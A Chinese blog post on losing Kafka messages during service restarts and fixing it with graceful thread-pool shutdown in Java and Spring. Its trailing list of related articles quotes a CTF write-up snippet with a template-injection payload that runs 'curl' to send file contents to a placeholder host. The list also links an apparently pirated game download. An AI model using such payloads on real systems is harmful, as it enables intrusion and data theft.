kakfa发版丢消息事件分析

背景

其他部门同事反馈在项目发版/重启(kill -15)的那段时间,经常会出现导致 C 端业务出现问题,从而产生资损

一听资损,赶紧应答下来,了解了下具体情况,然后立马去排查了

问题分析

结合同事的描述以及对业务的了解,很快就定位到是 kafka 消息丢失导致 C 端业务出现问题

业务当前消费架构图


从上图可以了解到几个点会导致目前这个场景消息丢失

  1. kafka 一秒一次的位移提交
  2. Queue 队列没消费完任务
  3. work 线程池从 Queue 中拉取的任务没消费完(每次拉取一个)

问题所在:因C端业务特性,非准实时的消息是没有意义的(分钟级),所以kafka的自动提交位移实际上是符合业务需求,三点结合起来看问题应该是出在:在发版时 消费单线程 依旧在拉取消息写入 Queue,并且后续的 线程池也没有将 Queue中的任务给处理完

消费架构改造

  1. 改造消费流程
  2. 启动时增加JVM关闭钩子,在关闭前将 isRunning 修改为fale,从而停止 消费单线程 继续拉取kafka消息
  3. 优雅关闭 work线程池

// shutdown() 与 shutdownNow()这里也给到一段shutdown测试代码
ThreadPoolExecutor executorService =
    new ThreadPoolExecutor(1, 1, 30, TimeUnit.SECONDS, new LinkedBlockingQueue<>());
AtomicInteger integer = new AtomicInteger();
for (int i = 0; i < 100; i++) {
    executorService.execute(() -> {
        try {
            System.out.println(new Date() + "=====>" + integer.incrementAndGet());
            Thread.sleep(1000L);
        } catch (Exception e) {
            e.printStackTrace();
        }
    });
}

Thread.sleep(5000L);
executorService.shutdown();
// executorService.shutdownNow();
System.out.println("线程池已触发shutdown");

随之而来的另一个问题,若在JVM关闭钩子中对 work线程池 操作shutdown,在任务中是有使用到Spring容器中的bean,若bean销毁了,那么work线程池中的任务都无法再执行成功(具体销毁优先级细则可自行百度,这里不做延伸)。
基于这个问题,回想到之前常用的一个注解 @PostConstruct 的一个孪生兄弟 @PreDestroy,这是在Java规范JSR-250引入的注解,定义了对象的创建和销毁工作,那么Spring必然对它有做支持,测试代码如下

ThreadPoolExecutor executorService =
        new ThreadPoolExecutor(1, 1, 30, TimeUnit.SECONDS, new LinkedBlockingQueue<>());

@PostConstruct
public void postConstruct(){
    AtomicInteger integer = new AtomicInteger();
    for (int i = 0; i < 100; i++) {
        executorService.execute(() -> {
            try {
                System.out.println(new Date() + "=====>" + integer.incrementAndGet());
                Thread.sleep(1000L);
            } catch (Exception e) {
                e.printStackTrace();
            }
        });
    }
}

@PreDestroy
public void preDestroy(){
    executorService.shutdown();
}

// 增加一个测试关闭的接口
@GetMapping("/shutdown")
public void shutdown() {
    System.exit(0);
}

测试结果依旧失败,看日志打印是正在处理线程池中已被接收的任务时挂掉的(这不科学,上面shutdown()测试案例结果明明会等待所有任务结束以后再结束),心里一群 草姓的马 飘过-_-

转念一想:其实这样也对,若一个池任务过多导致一直无法kill掉进程,这种行为也不对…那有没有什么补偿机制可以用,emm,山重水复疑无路,柳暗花明又一村哇,Doug Lea大神名不虚传,早就为我们考虑好了

// 贴出改动方法
@PreDestroy
public void preDestroy(){
    executorService.shutdown();
    try {
        if(executorService.awaitTermination(5, TimeUnit.SECONDS)){
            System.out.println("任务执行完毕结束");
        } else {
            System.out.println("time out 结束");
        }
    } catch (InterruptedException e) {
        System.out.println("Interrupted while waiting for executor");
        Thread.currentThread().interrupt();
        executorService.shutdownNow();
    }
}

嘿嘿,这么一改顺眼多了,线程池在shutdown后再至多等待N秒(若无任务则直接返回true),业务可以根据特性去决定此值配置


但是这么写多麻烦,那么多重要的线程池各个都要在这里写,那Spring如何实现线程池的优雅停的呢?想到Spring的生命周期中的 销毁回调,实现 DisposableBean 即可,那看看ThreadPoolTaskExecutor,其父类ExecutorConfigurationSupport在处理销毁时,会判定其 waitForTasksToCompleteOnShutdown 参数是否为true来决定是否要调用shutdown(),并且根据其 awaitTerminationSeconds 参数来决定是否需要调用 ExecutorService.awaitTermination 去等待线程池处理一定时间

那让我们来改造改造现在的work线程池,指定业务指定配置以后,交给spring去帮我们去做这些重复的销毁动作

写到最后

若使用Spring提供线程池,并指定以下两个参数即可实现线程池优雅停

  1. waitForTasksToCompleteOnShutdown 参数,在销毁时会帮我们调用一次线程池shutdown()
  2. awaitTerminationSeconds 参数,在调用shutdown以后可以等等一段时间,从而尽可能的将线程池中任务给执行完毕

ExecutorService.awaitTermination 虽好,可不要贪杯(滥用)哦,多个线程池都指定此参数并在销毁时都存在大量的任务,可能会导致 kill -15 的时间增加,从而出现一种 “kill不掉” 的现象

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/732964.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

02 Shell编程之条件语句

1、条件测试操作 要使Shell脚本程序具备一定的智能&#xff0c;面临的第一个问题就是如何区分不同的情况以确定执行何种操作。 例如&#xff0c;当磁盘使用率超过95%时&#xff0c;发送告警信息&#xff1b;当备份目录不存在时&#xff0c;能够自动创建&#xff1b; 当源码编…

LuxTrust、契约锁联合启动中欧两地跨境电子签服务

6月18日&#xff0c;欧洲领先的数字身份和电子签名厂商-LuxTrust、全球领先的数字化技术和服务的提供商-浩鲸科技一行莅临契约锁上海总部&#xff0c;并于当日下午联合举行“跨境签战略合作”现场签约仪式。 三方将以此次合作为契机&#xff0c;发挥各自领域专业优势&#xff…

intouch的报警怎么发到企业微信机器人

厂务报警通知系列博客目录 intouch的报警怎么发到微信上 intouch的报警怎么发到邮件上 intouch的报警怎么发到短信上 intouch的报警怎么发到企业微信机器人 intouch的报警怎么用语音通知到手机用户 创建企业微信群机器人 打开企业微信客户端&#xff0c;在某一个群聊里面…

【Java】已解决java.nio.channels.ClosedChannelException异常

文章目录 一、分析问题背景二、可能出错的原因三、错误代码示例四、正确代码示例五、注意事项 已解决java.nio.channels.ClosedChannelException异常 在Java的NIO&#xff08;New I/O&#xff09;编程中&#xff0c;java.nio.channels.ClosedChannelException是一个常见的异常…

Autosar Dcm配置-0x23服务ReadMemoryByAddress-基于ETAS软件

文章目录 前言Dcm配置DcmDsdDcmDspDcmDspMemoryIdInfo 代码分析总结 前言 一般在调教开发阶段&#xff0c;会使用XCP进行观测和标定&#xff0c;本质上也是操作指定的内存地址。量产后&#xff0c;一般XCP会取消。本文介绍的UDS ReadMemoryByAddress服务&#xff0c;也是读取内…

艾尔登法环黄金树幽影/ELDEN RING Shadow of the Erdtree(全DLC)

百度网盘 https://pan.baidu.com/s/1ulKiNQdVtV5dto-Vm7k4IA 提取码&#xff1a;yqrs 游戏介绍 《艾尔登法环》是一款以正统黑暗奇幻世界为舞台的动作RPG游戏。走进辽阔的场景与地下迷宫探索未知&#xff0c;挑战困难重重的险境&#xff0c;享受克服困境时的成就感吧。…

软件介绍—Fluent Reader (RSS阅读器)

软件介绍—Fluent Reader &#xff08;RSS阅读器&#xff09; 01 RSS介绍 RSS可翻译为简易信息聚合&#xff08;也叫聚合内容&#xff09;是一种基于XML的标准&#xff0c;在互联网上被广泛采用的内容包装和投递协议。简单来讲&#xff0c;就是可以“订阅”一些网站新发布的内…

【从0实现React18】 (一) 项目初始化

Multi-repo 和 Mono-repo 由于需要同时管理多个包&#xff0c;如React、React-dom等&#xff0c;所以选择**Mono-repo** 选择使用pnpm-workspace搭建Mono-repo环境的原因 依赖安装快更规范 Pnpm初始化 npm install -g pnpm pnpm init配置pnpm-workspace.yml文件 pnpm-work…

# 消息中间件 RocketMQ 高级功能和源码分析(十一)

消息中间件 RocketMQ 高级功能和源码分析&#xff08;十一&#xff09; 一、消息中间件 RocketMQ 源码分析&#xff1a; 拉取消息长轮询机制 1、消息拉取长轮询机制分析 RocketMQ 未真正实现消息推模式&#xff0c;而是消费者主动向消息服务器拉取消息&#xff0c;RocketMQ …

spring-依赖注入DI

Setter注入&#xff1a; 1、引用类型&#xff1a;在bean中定义引用类型属性并提供可访问的set方法&#xff0c;配置中使用property标签ref属性注入引用类型对象&#xff1b; 2、简单类型&#xff1a;在bean中定义引用类型属性并提供可访问的set方法&#xff0c;在配置中使用pr…

ctfshow web 其他 web432--web449

web432 过滤了os|open|system|read|eval ?codestr(.__class__.__bases__[0].__subclasses__[185].__init__.__globals__[__builtins__][__import__](os).__dict__[popen](curl http://ip:port?1cat /f*)) ?codestr(.__class__.__bases__[0].__subclasses__()[185].__init_…

Vue-条件渲染指令

条件渲染指令 条件渲染指令有两种&#xff1a; 两种指令大致相似 v-ifv-show 如果v-if的值为true&#xff0c;那么显示出内容&#xff0c;v-show也是一样 如果v-if的值为false&#xff0c;那么将不创建这个指令的标签&#xff0c;v-show将隐藏此标签 <body><div id&q…

Depth Anything V2:抖音开源高性能任何单目图像深度估计V2版本,并开放具有精确注释和多样化场景的多功能评估基准

&#x1f4dc;文献卡 题目&#xff1a; Depth Anything V2作者: Lihe Yang; Bingyi Kang; Zilong Huang; Zhen Zhao; Xiaogang Xu; Jiashi Feng; Hengshuang ZhaoDOI: 10.48550/arXiv.2406.09414摘要: This work presents Depth Anything V2. Without pursuing fancy technique…

在IDEA 2024.1.3 (Community Edition)中创建Maven项目

本篇博客承继自博客&#xff1a;Windows系统Maven下载安装-CSDN博客 Maven版本&#xff1a;maven-3.9.5 修改设置&#xff1a; 首先先对Idea的Maven依赖进行设置&#xff1b;打开Idea&#xff0c;选择“Costomize”&#xff0c;选择最下边的"All settings" 之后找…

什么是新媒体矩阵?如何搭建?

什么是新媒体&#xff1f; 新媒体矩阵作用 新媒体矩阵账号类型 搭建新媒体矩阵步骤

API接口技术开发分享;按关键字搜索淘宝、天猫商品API返回值接入说明

淘宝数据API的接入流程主要包括注册key账号、创建开发者应用、获取ApiKey和ApiSecret、申请API权限等步骤。淘通过这些接口可以获取商品、订单、用户、营销和物流管理等多方面的数据。以下是关于淘宝数据API接入流程的相关介绍&#xff1a; 注册key账号&#xff1a;进行账号注册…

Stable Diffusion部署教程,开启你的AI绘图之路

本文环境 系统&#xff1a;Ubuntu 20.04 64位 内存&#xff1a;32G 环境安装 2.1 安装GPU驱动 在英伟达官网根据显卡型号、操作系统、CUDA等查询驱动版本。官网查询链接https://www.nvidia.com/Download/index.aspx?langen-us 注意这里的CUDA版本&#xff0c;如未安装CUD…

Portainer.io安装并配置Docker远程访问及CA证书

Portainer.io安装并配置Docker远程访问及CA证书 文章目录 Portainer.io安装并配置Docker远程访问及CA证书一.安装 Portainer.io2.启动容器 二.docker API远程访问并配置CA安全认证1.配置安全(密钥)访问2.补全CA证书信息3.生成server-key.pem4.创建服务端签名请求证书文件5.创建…

遍历二叉树和线索二叉树

目录 一、*遍历二叉树 1.1遍历定义 1.2遍历目的 1.3遍历用途 1.4遍历方法 1.4.1先序遍历&#xff08;DLR&#xff09; 1.4.2中序遍历&#xff08;LDR&#xff09; 1.4.3后序遍历&#xff08;LRD&#xff09; 1.5根据遍历序列确定二叉树 1.6遍历算法的实现 1.6.1先序遍…

转--Hadoop集群部署案例

模块简介 本模块主要练习Hadoop集群部署。 模块知识 ● 使用Linux基础命令 ● Hadoop集群搭建部署知识 环境准备 三台CentOS7操作系统的虚拟机 可以是3个Docker容器&#xff0c;也可以是三个VMWare/VirtualBox的虚拟机。三台虚拟机的最低配置为1核1G 20G。如果是虚拟机中…